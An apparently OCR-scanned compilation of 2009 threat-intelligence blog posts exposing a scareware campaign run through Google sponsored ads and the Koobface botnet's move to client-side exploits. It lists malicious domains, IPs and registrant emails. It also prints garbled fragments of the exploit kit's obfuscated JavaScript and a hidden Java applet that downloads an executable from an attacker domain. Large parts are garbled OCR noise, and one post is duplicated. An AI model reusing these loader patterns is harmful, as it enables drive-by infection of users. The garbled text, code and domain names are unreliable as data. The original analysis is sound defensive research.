11. http: //ddanchev.blogspot.com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.htm 


12. http://ddanchev.blogspot .com/2009/07/multitasking-fast-flux-botnet-that.htm 


13. http://ddanchev.blogspot.com/ 
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5.11.10 Scareware Campaign Using Google Sponsored Links (2009-11-19 00:30) 


A scareware campaign is currently using Google sponsored ads, and by hijacking a decent 
number of well positioned keywords, is attempting to trick visitors into installing scareware 
featuring several new templates. This is, of course, not the first and definitely not the last 
time scareware Campaigners are using highly targeted legitimate networks in order to reach 
potential audience by making an investment into the traffic acquisition practice. 


Google free anti-malware Search | Ad-e-ces Seen 
Web & Show options Results 1 - 10 of about 6,290,000 for free anti-malware. (0.20 seconds) 


Malware Removal Download : 
wew STOPzillacom Free Malware Scan. Award-winning Malware Remover. Download now. (Go « GED 


Trojan Remover 
Free Trojan Scan. Winner of the 
Best Ami-Troyan. Rated 5 Stars! 


ree Anti Malware 


www AntiMalwarencw co 


ding Mabware Rema 


www pctools Com 
Malwarebytes Anti-Malware - Free software downloads and software ... 
aaannRevew by Seth Rosenblatt - Feb 1 : 2009 Free Malware Detect 
Pros: Malwarebytes Anti-Malware 1.41 is a great program, along with being Free. it will detect Top Ranked. As Seon on USA Today 
threats that other programs might miss. ... Detect & Find, Spyware and Virus 
download cnet com/Malwarebytes-Anti-Malware/3000-8022_4-10804572 htm MatwareRemoval CyberDefender.com 


However, compared to the "long tail centered" blackhat SEO, the use of legitimate ad 
networks would never reach a positive ROI, like the one achieved by dynamic syndication of 
legitimate content and monetizing it through scareware. 
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Make Your PC Run Like New! 


Remove Matware and Viruses instantly 


Block Future infections With Real Time Shield 
= Protect Against Computer Hackers 

Hassle-Free 1-Click-Fix Technology 

Over 47 Million downloads wortdwide 


Vv’ FREE Download 


AS EASY AS 


12,3 


"Anti-Malware Made Simple!" eto 
 ) Removes and Biocks Veuses, ttateere, Spyerere, and Trojans. LIVECHAT 
JK Kits Browser tjackers, Keyloggers, Olaters, Bots and ciner teats. Speak to 2 real pernont 


& iter cepts and Destroys Al foers of Urerented Pop Ups. 
QD Frequent scrware updates provide optimal PC protection. 


6 Utere Easy to Use . 1 Cick of he Mouse fixes your Computer. 


oe Free, Uahenited Live 247 Customer Support. vows 208 
fate 2400 
Cownnace: 4? 023.977 


Top Rated Spyware Protection 


Malware Professional has been downloaded over 47 Millon times by 


Scareware domains seen in circulation: 

adwarealert .com - 75.125.200.226 

adware-pro-2009 .com - 209.216.193.113 

adwareprosite .com - 188.121.46.1 - Email: pedrocanas75@gmail.com 
adwarepro-site .com - 209.216.193.101 - Email: pedrocanas75@gmail.com 
antimalwarenow .com - 173.201.0.128 

anti-malware-pro .org - 209.216.193.103 - Email: pedrocanas75@gmail.com 
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© you ese be rtercet There & ower 90% chance your computer is 
wiected we? spyware - 


(© Downton nowt | Gy Acwoareatent | Gy rAG | Gy free scat | Gy Support 


1AgWareAlet scare your computer for 
meson paraates anc cemcves Sem 


permarenty 
2.0ur advanced aysiem cleaner works te 


separ and correct errors caueed by ad and runny at ta orignal 
zywares and tweaks your PC for optimal _ speed 

performarce — 

DArscyrg pop-up ada are bected before " -—— ) erwer 


trey Mave a chacce te better you agar 


rn | 


, , , , , , 
© Adi erekient 9 he eorld) lepang eceme ane oyete remove 

Comyngnt 2264-2009 AcWareAL SRT com - As Rigre Reserves 

(emerer Vint One He Winwows Woe Biet tuton are Reem ete of epeteret basen ate of Microec® 
Comporamen 0 the United Susie: ance othe Corres 


antimalware-software .com - 209.216.193.11 


antimalware-software .org - 209.216.193.106 - Email: pedrocanas75@gmail.com 
get-spyware-destroyer .com - 63.243.188.37 - Email: admin@upclick.com 


macrovirus .com - 75.125.152.58 


malwareprofessional .com - 74.205.8.6 
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Features CIIMINATE YVOUD PC pooRIcnc 
B Remove Mamwe &Sovnme 
BS Fx Windows Errors 
Bi Repee rewevet exokore eves 
DF Remove a veus & ron 
© Prevents PC fom Crashing 
© Restore Convect Pies & Regetres 
D tock Poows 
© Pex Conrupe Files 
& Oaty Promecton upcones 


Make Your PC Rur 


Why AntiMalware Pro? 


theantimalware .com - 173.201.0.12 
adware-pro-live .com - 209.216.193.9 
antivirus-live-pro .com - 209.216.193.9 
antivirus-live-pro .org 
antivirus-live-software .com 
antivirus-pro-live .com 
antiviruspro-live .com 


Sample detection rates: [l]Janti-malware-application.exe; [2]malware _professional.exe; 
[3]macro _virus.exe; [4]Jantimalware _pro.exe; [5]spyware _destroyer.exe; [6]AdwarePro 
_Setup.exe; [7]AdwarePro Setup06.exe; [8]AdwarePro Setup2305.exe. 


Consider going through the [9]The Ultimate Guide to Scareware Protection detailing al- 
ternative traffic acquisition approaches used by scareware campaigners, as well as the related 
posts dissecting recent blackhat SEO campaigns. 


Related posts: 

[10]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[11]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign 
[12]U.S Federal Forms Blackhat SEO Themed Scareware Campaign Expanding 
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[13]Blackhat SEO Campaign Hijacks U.S Federal Form Keywords, Serves Scareware 

[14]A Peek Inside the Managed Blackhat SEO Ecosystem 

[15]Dissecting a Swine Flu Black SEO Campaign 

[16]Massive Blackhat SEO Campaign Serving Scareware 

[17]From Ukrainian Blackhat SEO Gang With Love 

[18]From Ukrainian Blackhat SEO Gang With Love - Part Two 

[19]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and Black- 
hat SEO Farms 

[20]Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at Blogspot 


This post has been reproduced from [21]Dancho Danchev’s blog. 
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14. http://ddanchev. blogspot .com/2009/06/peek- inside-managed-blackhat-seo.htm 


ttp://ddanchev. blogspot .com/2009/05/dissecting-swine-flu-black-seo-campaign. htm 


. http://ddanchev. blogspot .com/2009/04/massive-blackhat-seo-campaign-serving. htm 


ttp://ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with.htm 
ttp://ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 


19. http: //ddanchev. blogspot .com/2009/06/from-ukraine-with-scareware-serving.htm 


py 
oO 


N 
2 


ttp://ddanchev. blogspot .com/2009/06/fake-web-hosting-provider-front-end-to.htm 


21. http://ddanchev.blogspot.com/ 
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5.11.11 Koobface Botnet Starts Serving Client-Side Exploits (2009-11-25 20:09) 


Nevepetee FR214981TS/ OEE view ce. * 
ie 98214.98.195 On B/ view /comole= yes s/?go 
od 


v* 


/div 


{body 
/bhtaml 
Svs 2 ee en fet 


UPDATED, Wednesday, December 02, 2009: The systematic rotation of new redirectors and 
scareware domains remains ongoing, with no signs of resuming the use of client-side exploits. 


Some of the latest ones include inviteerverwhere .cn - Email: box@cethcuples.com -> 
scanner-infoa .com - Email: inout@celestia.com, 


[1]scareware detection rate 


; leconomyguide .cn - Email: contact@berussa.de -> superdefenceaj .com - Email: in- 
out@celestia.com, [2]scareware detection rate; slip-stream .cn - Email: info@mercedess.de 
-> getsafeantivirusa .com - Email: morrison2g@yahoo.com, [3]scareware detection rate. 


The complete list of redirectors introduced over the past week is as follows: leconomyguide 
.cn; lmonocline .cn; Lnonsensical .cn; lonlinestarter .cn; lpolitical-news .cn; argentinastyle 
.cn; australiagold .cn; austriamoney .cn; beatupmean2 .cn; belgiumnation .cn; brazilcoun- 
try .cn; firefoxfowner .cn; inviteerverwhere .cn; iraqcontacts .cn; makenodifference2 .cn; 
manualgreese .cn; overmerit3 .cn; powerhelms2 .cn; secretalltrue2 .cn; separator2009 .cn; 
slip-stream .cn; solidresistance .cn; wallgreensmart .cn; windowsclone .cn; womenregrets 
.cn; womenregrets2 .cn 


UPDATED, Saturday, November 28, 2009: Following yesterday’s experiment with bit.ly 
redirectors, relying on a "visual social engineering element" by adding descriptive domains 
after the original link - bit.ly/588dmE?YOUTUBE.COM/ea05981d43, which works with any 
generated bit.ly link, the gang is now spamvertising links using Google News redirection to 
automatically registered Blogspot accounts, whose [4]CAPTCHA challenge has been solved 
by the already infected with Koobface victims, a feature that is now mainstream, compared 
to the gang’s previous use of [5]commercial CAPTCHA solving services, where the price for a 
thousand solved CAPTCHAs varies between $1 and $2: 


- news.google.com/news/url?url=http://pierrickcastoe .blogspot.com/ 
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- news.google.com/news/url?url=http://biilybiilybangert .blogspot.com/ 

- news.google.com/news/url?url=http://majdimajdinoordijk .blogspot.com/ 
- news.google.com/news/url?url=http://vassellpelovska .blogspot.com/ 

- news.google.com/news/url?url=http://troitroiweinbrenner .blogspot.com/ 
- news.google.com/news/url?url=http://keyserefrain .blogspot.com/ 


New redirectors introduced include: 

overmerit3 .cn - Email: admin@cryzisday.com 
belgiumnation .cn - Email: vesta@greaselive.au 
iraqcontacts .cn - Email: admin@resemm.de 
womenregrets .cn - Email: admin@resemm.de 
wallgreensmart .cn - Email: admin@cryzisday.com 
brazilcountry .cn - Email: vesta@greaselive.au 
womenregrets2 .cn - Email: in@groovezone.com 


News scareware domains introduced include: 
internetdefencesystem .com - Email: admin@wyverny.com 
royalsecure-al .com - Email: in@groovezone.com 
royaldefencescan1 .com - Email: in@groovezone.com 
royaldefensescan1 .com - Email: in@groovezone.com 
royaldefencescan .com - Email: contacts@esseys.au 
royaldefensescan .com - Email: contacts@esseys.au 
royalprotectionscan .com - Email: contacts@esseys.au 


[6]Sampled copy phones back to a new domain (austin2reed .com/?b=1s1; austin2reed 
.com/?b=1) using the same IP (92.48.119.36) as the previous phone-back domain. 


UPDATED, Thursday, November 26, 2009: The gang has currently suspended the use of 
client-side exploits, let’s see if it’s only for the time being or indefinitely. Scareware is 
whatsoever, introduced with periodically registered new domains - argentinastyle .cn - 
Email: vesta@greaselive.au and australiagold .cn - Email: vesta@greaselive.au, redirect 
to bestscan066 .com - Email: fransysles2@yahoo.com and to bestscan044 .com - Email: 
fransysles2@yahoo.com - [7]detection rate. 


The exploit serving domains (el3x .cn; kiano-180809 .com and ttt20091124 .info) remain 
active. 


The Koobface botnet, a case study on propagation relying exclusively on social engineer- 
ing tactics and systematic abuse of legitimate Web 2.0 services, has introduced a second 
"game-changer" next to the [8]migration to distributed command and control infrastructure 
once its [9]centralized operations got shut down. 


Next to the embedded and automatically rotating scareware redirects placed on each and 
every infected host part of the Koobface botnet, the gang behind it has now started officially 
using client-side exploits (/10]VBS/Psyme.BM; [11]Exploit.Pidief.EX; [12]Exploit.Win32.IMG- 
WMF etc.) by embedding two iFrames on all the Koobface-infected hosts (Underground 
Molotov - function molot (m)), which connect to a well Known (average) web malware exploita- 
tion kit’s interface. Not only would a user that clicks on the Koobface URL be exposed to the 
Koobface binary itself, now pushed through client-side exploits, but also, to the periodically 
changed scareware domains. 
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Navagation OR ee ME clin cn testi indexphp * ihwx 
[@ eticcn/testi3/ndex php bhtml><body “ 
% wet be 
eros script types'text/javascript’ srow’x.x'></script 
——— script 


function molot (m) 
( 
eval (m); 


function aal () 

{ 

Var nB&g9Jqz =""; 

nBSg9Iqz * ‘asdfed sdsadee31i25asdfed sdsadee3130asdfsd sdsadee3lilasdfsd sdead 

return nB&g9Jqz; 

PES BE tres Oca xf = aal(); 

var Djeibcuf ='t’; 

var ErWeMTrd = KUKUR (xf, DjelbCIL); 

Er¥eMTzd © unescape (ErwentTzd) ; 
= u’+'’ne "o't’a’t’ pe (ErW@SMtzd); molot (x): *) 


Applet Code="Downloader.cl " archive="Downloader.jar” width="0" Height="1" 
PARAM HAME®* “filename” VALUE* “tenp. exe” 
PARAM MAME="url path” VALUE="hittp: o13x.cn/test13/load. php?api avad” 
/applet 
SCRIPT LANGUAGE® “javascript” 
function fakes () ~ 
< > 


l AEE Eb Otiacsently Gi Gockmarks §R Catcutstor 


Let’s dissect the campaign, expose the entire domains portfolio involved or introduced since 
the beginning of the week, and once again establish a connection between the Koobface gang 
and money mule recruitment scams followed by scareware domains ([13]lnst _312s2.exe; 
[14]Inst 312s2.exe from [15]today, both of them phone back to [16]angle-meter .com/?b=1), 
all registered using the same emails. 


Scareware redirectors seen during the past couple of the days, parked at 91.213.126.250: 
solidresistance .cn - Email: admin@cryzisday.com 
separator2009 .cn - Email: admin@cryzisday.com 
zapotec2 .cn - Email: admin@cryzisday.com 
befree2 .cn - Email: gmk2000@yahoo.com 
entombing2009 .cn - Email: info@grindsteal.fr 
economyguide .cn - Email: info@plaguegr.de 
smile-life .cn - Email: gmk2000@yahoo.com 
everlastmovie .cn - Email: gmk2000@yahoo.com 
monocline .cn - Email: info@plaguegr.de 
mozzillaclone .cn - Email: sanbeans6@yahoo.com 
monkey-greese .cn - Email: sanbeans6@yahoo.com 
surgingnurse .cn - Email: info@grindsteal.fr 
mailboxinvite .cn - Email: sanbeans6@yahoo.com 
flatletkick .cn - Email: info@plaguegr.de 
nonsensical .cn - Email: info@grindsteal.fr 
moralisefilm .cn - Email: info@grindsteal.fr 
firefoxavatar .cn - Email: sanbeans6@yahoo.com 
onlinestarter .cn - Email: info@plaguegr.de 
clowncirus .cn - Email: sanbeans6@yahoo.com 
political-news .cn - Email: info@plaguegr.de 
harry-pott .cn - Email: gmk2000@yahoo.com 
repeatability .cn - Email: info@grindsteal.fr 
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antivir7.com 


beprotected-1.com 


cyber-scan016.com 
83.133.0.0/16 ——AS_y, AS13237 


83.133.119.84 


cyber-scan026.com 


spyware-scan9.com 


today-scann.com 


New scareware domains portfolio parked at 95.143.192.51; 83.133.119.84; 91.213.126.103: 
valuewebscana .com - Email: lynd.stafford@yahoo.com 
valuescana .com - Email: lynd.stafford@yahoo.com 
cyber-scan-1 .com - Email: admin@dedicatezoom.com 
yourantispy-1 .com - Email: shah _indigo@googlemail.com 
cyber-scan0O11 .com - Email: admin@dedicatezoom.com 
cyber-scan-2 .com - Email: admin@dedicatezoom.com 
antimalware-3 .com - Email: shah _indigo@googlemail.com 
yourmalwarescan3 .com - Email: shah _indigo@googlemail.com 
antimalwarescana4 .com - Email: j.wirtth@smsdetective.com 
today-scan4 .com - Email: millercall413@yahoo.com 
antispy-scan5 .com - Email: shah _indigo@googlemail.com 
yourantivira7 .com - Email: j.wirtth@smsdetective.com 
yourmalwarescan7 .com - Email: info@bellyn.com 
yourantispy-8 .com - Email: info@bellyn.com 

cyber-scan08 .com - Email: admin@dedicatezoom.com 
cyber-scan09 .com - Email: admin@dedicatezoom.com 
beprotected9 .com - Email: essi@calinsella.eu 
spyware-scan9 .com - Email: info@bellyn.com 
yourantispy-a .com - Email: shah _indigo@googlemail.com 
checkforspywarea .com - Email: sanbeans6@yahoo.com 
checkfilesherea .com - Email: sanbeans6@yahoo.com 
scanfilesherea .com - Email: sanbeans6@yahoo.com 
findprotectiona .com - Email: admin@wyverny.com 
checkfilesnowa .com - Email: sanbeans6@yahoo.com 
web-scanm .com - Email: essi@calinsella.eu 

today-scann .com - Email: essi@calinsella.eu 
4eay-protection .com - Email: millercall413@yahoo.com 


The client-side exploit redirection takes place through three separate domains, all involved 
in previous Zeus crimeware campaigns, parked on the same IP in a cybercrime-friendly ASN. 
For instance, el3x.cn/test13/index.php - [17]210.51.166.119 - Email: Exmanoize@qip.ru redi- 
rects to el3x.cn/test13/x.x -> el3x.cn/test13/pdf.php -> el3x.cn/test13/load.php?spl=javad -> 
el3x.cn/test13/soc.php using [18]VBS/Psyme.BM; [19]Exploit.Pidief.EX; [20JExploit.Win32.IMG- 
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WMF etc. pushing [21]load.exe, which phones back to a well known "leftover" from Koobface 
botnet’s centralized infrastructure - xtsd20090815 .com/adm/index.php. 


Now it gets even more interesting, with the Koobface gang clearly rubbing shoulders 
with authors of actual web malware exploitation kits, who diversify their cybercrime opera- 
tions by participating in money mule recruitment scams, zeus crimeware serving campaigns, 
and scareware. 


Parked on [22]210.51.166.119 where the first iFrame is hosted, are also the following domains 
participating in related campaigns: 

amerOtest0 .cn - Email: abusehostserver@gmail.com -> [23]money mule recruitment 
antivirusfreecO .cn - Email: abusehostserver@gmail.com -> [24]money mule recruitment 
arendanomer2 .cn - Email: Exmanoize@qip.ru 

dom0cn .cn - Email: Exmanoize@qip.ru 

domicn .cn - Email: Exmanoize@qip.ru 

dom2cn .cn - Email: Exmanoize@qip.ru 
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domx0 .cn - Email: Exmanoize@qip.ru 

domx1 .cn - Email: Exmanoize@qip.ru 

domx2 .cn - Email: Exmanoize@qip.ru 

dox0 .cn - Email: Exmanoize@qip.ru 

dox1 .cn - Email: Exmanoize@qip.ru 

dox2 .cn - Email: Exmanoize@qip.ru 

dox3 .cn - Email: Exmanoize@qip.ru 

edit2china .cn - Email: Exmanoize@qip.ru 

edit3china .cn - Email: Exmanoize@qip.ru 

el1x .cn - Email: Exmanoize@gqip.ru 

el2x .cn - Email: Exmanoize@gip.ru 

el3x .cn - Email: Exmanoize@gqip.ru 

gymOreplace .cn - Email: chen.p00n1732646@yahoo.com -> [25]scareware domain registra- 
tion 

herosimalyet .cn - Email: Exmanoize@qip.ru 
herosimalyet00g .cn - Email: abusehostserver@gmail.com 
otherchina .cn - Email: Exmanoize@qip.ru 

parliament .tk - Email: royalddos@gmail.com 

privet1 .cn - Email: Exmanoize@qip.ru 

privet2 .cn - Email: Exmanoize@qip.ru 

privet3 .cn - Email: Exmanoize@qip.ru 

sport-lab .cn - Email: abuseemaildhcp@gmail.com -> [26]money mule recruitment domain 
[27 ]registrations 

trafdomins .cn - Email: Exmanoize@gip.ru 
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The second iFrame domain parked at [28]61.235.117.83 redirects in the following way - 
kiano-180809 .com/oko/help.html - 61.235.117.83 - Email: bigvillyxxx@gmail.com leads to 
kiano-180809 .com/oko/dyna _soc.html -> kiano-180809 .com/oko/tomato guy _13.html -> 
kiano-180809 .com/oko/update.vbe -> kiano-180809 .com/oko/dyna_wm.wnff. 


The same exploitation structure is valid for the third iFrame domain - ttt20091124 
.info/oko/help.html which is again, parked at 61.235.117.83 and was embedded at Koobface- 
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infected hosts over the past 24 hours. 


What prompted this shift on behalf of the Koobface gang? Declining infection rates - 
I’m personally not seeing a decline in the click-through rate, with over 500 clicks on a spamver- 
tised Kooobface URL over a period of 24 hours - or their obsession with traffic optimization? 
In terms of social engineering, the [29]periodic introduction of new templates proved highly 
successful for the gang, but the newly introduced outdated client-side exploits can in fact 
generate more noise than they originally anticipated, if they were to continue relying on 
[30]social engineering vectors only. 


One thing’s certain - the Koobface gang is now on the offensive, and it would be inter- 
esting to see whether they’d introduce a new exploits set, or continue relying on the one 
offered by the web exploitation kit. 


Related posts: 

[31]Secunia: Average insecure program per PC rate remains high 
[32]Research: 80 % of Web users running unpatched versions of Flash/Acrobat 
[33]Fake Security Software Domains Serving Exploits 

[34]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[35]Koobface Botnet’s Scareware Business Model - Part Two 
[36]Koobface Botnet’s Scareware Business Model - Part One 
[37]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[38]New Koobface campaign spoofs Adobe’s Flash updater 

[39]Social engineering tactics of the Koobface botnet 

[40]Koobface Botnet Dissected in a TrendMicro Report 

[41]Koobface Botnet’s Scareware Business Model 

[42]Movement on the Koobface Front - Part Two 

[43]Movement on the Koobface Front 

[44]Koobface - Come Out, Come Out, Wherever You Are 

[45]Dissecting Koobface Worm’s Twitter Campaign 

[46]Dissecting the Koobface Worm’s December Campaign 
[47]Dissecting the Latest Koobface Facebook Campaign 

[48]The Koobface Gang Mixing Social Engineering Vectors 


This post has been reproduced from [49]Dancho Danchev’s blog. 
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5.11.12 Koobface Botnet Starts Serving Client-Side Exploits (2009-11-25 20:09) 
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UPDATED, Wednesday, December 02, 2009: The systematic rotation of new redirectors and 
scareware domains remains ongoing, with no signs of resuming the use of client-side exploits. 


Some of the latest ones include inviteerverwhere .cn - Email: box@cethcuples.com -> 
scanner-infoa .com - Email: inout@celestia.com, 


[1]scareware detection rate 


; leconomyguide .cn - Email: contact@berussa.de -> superdefenceaj .com - Email: in- 
out@celestia.com, [2]scareware detection rate; slip-stream .cn - Email: info@mercedess.de 
-> getsafeantivirusa .com - Email: morrison2g@yahoo.com, [3]scareware detection rate. 


The complete list of redirectors introduced over the past week is as follows: leconomyguide 
.cn; Lmonocline .cn; Lnonsensical .cn; lonlinestarter .cn; lpolitical-news .cn; argentinastyle 
.cn; australiagold .cn; austriamoney .cn; beatupmean2 .cn; belgiumnation .cn; brazilcoun- 
try .cn; firefoxfowner .cn; inviteerverwhere .cn; iraqcontacts .cn; makenodifference2 .cn; 
manualgreese .cn; overmerit3 .cn; powerhelms2 .cn; secretalltrue2 .cn; separator2009 .cn; 
slip-stream .cn; solidresistance .cn; wallgreensmart .cn; windowsclone .cn; womenregrets 
.cn; womenregrets2 .cn 


UPDATED, Saturday, November 28, 2009: Following yesterday’s experiment with bit.ly 
redirectors, relying on a "visual social engineering element" by adding descriptive domains 
after the original link - bit.ly/588dmE?YOUTUBE.COM/ea05981d43, which works with any 
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generated bit.ly link, the gang is now spamvertising links using Google News redirection to 
automatically registered Blogspot accounts, whose [4]CAPTCHA challenge has been solved 
by the already infected with Koobface victims, a feature that is now mainstream, compared 
to the gang’s previous use of [5]commercial CAPTCHA solving services, where the price for a 


thousand solved CAPTCHAs varies between $1 and $2: 


- news.google.com/news/url?url=http://pierrickcastoe .blogspot.com/ 

- news.google.com/news/url?url=http://biilybiilybangert .blogspot.com/ 

- news.google.com/news/url?url=http://majdimajdinoordijk .blogspot.com/ 
- news.google.com/news/url?url=http://vassellpelovska .blogspot.com/ 

- news.google.com/news/url?url=http://troitroiweinbrenner .blogspot.com/ 


- news.google.com/news/url?url=http://keyserefrain .blogspot.com/ 


New redirectors introduced include: 

overmerit3 .cn - Email: admin@cryzisday.com 
belgiumnation .cn - Email: vesta@greaselive.au 
iraqcontacts .cn - Email: admin@resemm.de 
womenregrets .cn - Email: admin@resemm.de 
wallgreensmart .cn - Email: admin@cryzisday.com 
brazilcountry .cn - Email: vesta@greaselive.au 


womenregrets2 .cn - Email: in@groovezone.com 


News scareware domains introduced include: 
internetdefencesystem .com - Email: admin@wyverny.com 
royalsecure-al .com - Email: in@groovezone.com 
royaldefencescan1 .com - Email: in@groovezone.com 


royaldefensescan1 .com - Email: in@groovezone.com 
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royaldefencescan .com - Email: contacts@esseys.au 
royaldefensescan .com - Email: contacts@esseys.au 


royalprotectionscan .com - Email: contacts@esseys.au 


[6]Sampled copy phones back to a new domain (austin2reed .com/?b=1s1; austin2reed 
.com/?b=1) using the same IP (92.48.119.36) as the previous phone-back domain. 


UPDATED, Thursday, November 26, 2009: The gang has currently suspended the use of 
client-side exploits, let’s see if it’s only for the time being or indefinitely. Scareware is 
whatsoever, introduced with periodically registered new domains - argentinastyle .cn - 
Email: vesta@greaselive.au and australiagold .cn - Email: vesta@greaselive.au, redirect 
to bestscan066 .com - Email: fransysles2@yahoo.com and to bestscan044 .com - Email: 
fransysles2@yahoo.com - [7]detection rate. 


The exploit serving domains (el3x .cn; kiano-180809 .com and ttt20091124 .info) remain 
active. 


The Koobface botnet, a case study on propagation relying exclusively on social engineer- 
ing tactics and systematic abuse of legitimate Web 2.0 services, has introduced a second 
"game-changer" next to the [8]migration to distributed command and control infrastructure 
once its [9]centralized operations got shut down. 


Next to the embedded and automatically rotating scareware redirects placed on each and 
every infected host part of the Koobface botnet, the gang behind it has now started officially 
using client-side exploits (/10]VBS/Psyme.BM; [11]Exploit.Pidief.EX; [12]JExploit.Win32.IMG- 
WMF etc.) by embedding two iFrames on all the Koobface-infected hosts (Underground 
Molotov - function molot (m)), which connect to a well known (average) web malware exploita- 
tion kit’s interface. Not only would a user that clicks on the Koobface URL be exposed to the 
Koobface binary itself, now pushed through client-side exploits, but also, to the periodically 
changed scareware domains. 
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Navagation 
@ ctdccn/testi3/index php 


bhtml><body “ 
br 
seoript types'’text/javascript’ sro#'x,.x"></script 
script 
function molot (m) 
( 
eval (m) = 
) 


function aal() 
{ 


xf = aal(); 

var Djeibcoft «"t'; 

var ErWe6MTrd = KUKUR (xf, DjelbCIL); 

ErWGmMTzd © unescape (ErwoMTzd) ; 

eval ('va'+’r x = u’+’nes’+’c’+’a’t’ pe (ErWSMtTzd); molot(x); °") 
/seript 
Applet Code="C 
PARAM HAME®"f 
PARAM MAME="url 
/applet 


rloader.jar” width="0" Height="1" 


ad. php?spl=javad" 


SCRIPT LANGUAGE® “javascript” 
function fakes () a 


l SALTER Eb Ceanently Gi Gockmats 9 Catkulstor 


Let’s dissect the campaign, expose the entire domains portfolio involved or introduced since 
the beginning of the week, and once again establish a connection between the Koobface gang 
and money mule recruitment scams followed by scareware domains ([13]lnst _312s2.exe; 
[14]Inst 312s2.exe from [15]today, both of them phone back to [16Jangle-meter .com/?b=1), 
all registered using the same emails. 


Scareware redirectors seen during the past couple of the days, parked at 91.213.126.250: 
solidresistance .cn - Email: admin@cryzisday.com 
separator2009 .cn - Email: admin@cryzisday.com 
zapotec2 .cn - Email: admin@cryzisday.com 
befree2 .cn - Email: gmk2000@yahoo.com 
entombing2009 .cn - Email: info@grindsteal.fr 
economyguide .cn - Email: info@plaguegr.de 
smile-life .cn - Email: gmk2000@yahoo.com 
everlastmovie .cn - Email: gmk2000@yahoo.com 
monocline .cn - Email: info@plaguegr.de 
mozzillaclone .cn - Email: sanbeans6@yahoo.com 
monkey-greese .cn - Email: sanbeans6@yahoo.com 


surgingnurse .cn - Email: info@grindsteal.fr 
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mailboxinvite .cn - Email: sanbeans6@yahoo.com 
flatletkick .cn - Email: info@plaguegr.de 
nonsensical .cn - Email: info@grindsteal.fr 
moralisefilm .cn - Email: info@grindsteal.fr 
firefoxavatar .cn - Email: sanbeans6@yahoo.com 
onlinestarter .cn - Email: info@plaguegr.de 
clowncirus .cn - Email: sanbeans6@yahoo.com 
political-news .cn - Email: info@plaguegr.de 
harry-pott .cn - Email: gmk2000@yahoo.com 


repeatability .cn - Email: info@grindsteal.fr 


antivir7.com 


beprotected-1.com 


cyber-scan016.com 
83.133.0.0/16 —_—AS_y, AS13237 


83.133.119.84 


cyber-scan026.com 


spyware-scan9.com 


today-scann.com 


New scareware domains portfolio parked at 95.143.192.51; 83.133.119.84; 91.213.126.103: 
valuewebscana .com - Email: lynd.stafford@yahoo.com 

valuescana .com - Email: lynd.stafford@yahoo.com 

cyber-scan-1 .com - Email: admin@dedicatezoom.com 


yourantispy-1 .com - Email: shah _indigo@googlemail.com 
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cyber-scan0O11 .com - Email: admin@dedicatezoom.com 
cyber-scan-2 .com - Email: admin@dedicatezoom.com 
antimalware-3 .com - Email: shah _indigo@googlemail.com 
yourmalwarescan3 .com - Email: shah _indigo@googlemail.com 
antimalwarescana4 .com - Email: j.wirth@smsdetective.com 
today-scan4 .com - Email: millercall413@yahoo.com 
antispy-scan5 .com - Email: shah _indigo@googlemail.com 
yourantivira7 .com - Email: j.wirth@smsdetective.com 
yourmalwarescan7 .com - Email: info@bellyn.com 
yourantispy-8 .com - Email: info@bellyn.com 

cyber-scan08 .com - Email: admin@dedicatezoom.com 
cyber-scan09 .com - Email: admin@dedicatezoom.com 
beprotected9 .com - Email: essi@calinsella.eu 
spyware-scan9 .com - Email: info@bellyn.com 
yourantispy-a .com - Email: shah _indigo@googlemail.com 
checkforspywarea .com - Email: sanbeans6@yahoo.com 
checkfilesherea .com - Email: sanbeans6@yahoo.com 
scanfilesherea .com - Email: sanbeans6@yahoo.com 
findprotectiona .com - Email: admin@wyverny.com 
checkfilesnowa .com - Email: sanbeans6@yahoo.com 
web-scanm .com - Email: essi@calinsella.eu 

today-scann .com - Email: essi@calinsella.eu 


4eay-protection .com - Email: millercall413@yahoo.com 


The client-side exploit redirection takes place through three separate domains, all involved 
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in previous Zeus crimeware campaigns, parked on the same IP in a cybercrime-friendly ASN. 
For instance, el3x.cn/test13/index.php - [17]210.51.166.119 - Email: Exmanoize@gqip.ru redi- 
rects to el3x.cn/test13/x.x -> el3x.cn/test13/pdf.php -> el3x.cn/test13/load.php?spl=javad -> 
el3x.cn/test13/soc.php using [18]VBS/Psyme.BM,; [19]Exploit.Pidief.EX; [20JExploit.Win32.IMG- 
WMF etc. pushing [21]load.exe, which phones back to a well known "leftover" from Koobface 
botnet’s centralized infrastructure - xtsd20090815 .com/adm/index.php. 


Now it gets even more interesting, with the Koobface gang clearly rubbing shoulders 
with authors of actual web malware exploitation kits, who diversify their cybercrime opera- 
tions by participating in money mule recruitment scams, zeus crimeware serving campaigns, 
and scareware. 
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Parked on [22]210.51.166.119 where the first iFrame is hosted, are also the following domains 
participating in related campaigns: 


amerOtest0O .cn - Email: abusehostserver@gmail.com -> [23]money mule recruitment 
antivirusfreecO .cn - Email: abusehostserver@gmail.com -> [24]money mule recruitment 
arendanomer2 .cn - Email: Exmanoize@qip.ru 

dom0cn .cn - Email: Exmanoize@qip.ru 

domicn .cn - Email: Exmanoize@gip.ru 

dom2cn .cn - Email: Exmanoize@qip.ru 

domx0 .cn - Email: Exmanoize@qip.ru 

domx1 .cn - Email: Exmanoize@qip.ru 

domx2 .cn - Email: Exmanoize@qip.ru 

dox0O .cn - Email: Exmanoize@qip.ru 

dox1 .cn - Email: Exmanoize@qip.ru 

dox2 .cn - Email: Exmanoize@qip.ru 

dox3 .cn - Email: Exmanoize@qip.ru 

edit2china .cn - Email: Exmanoize@qip.ru 

edit3china .cn - Email: Exmanoize@qip.ru 

ellx .cn - Email: Exmanoize@gqip.ru 

el2x .cn - Email: Exmanoize@gqip.ru 

el3x .cn - Email: Exmanoize@qip.ru 


gymOreplace .cn - Email: chen.poon1732646@yahoo.com -> [25]scareware domain reg- 
istration 


herosimalyet .cn - Email: Exmanoize@qip.ru 
herosimalyet00g .cn - Email: abusehostserver@gmail.com 
otherchina .cn - Email: Exmanoize@qip.ru 


parliament .tk - Email: royalddos@gmail.com 
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privetl .cn - Email: Exmanoize@qip.ru 
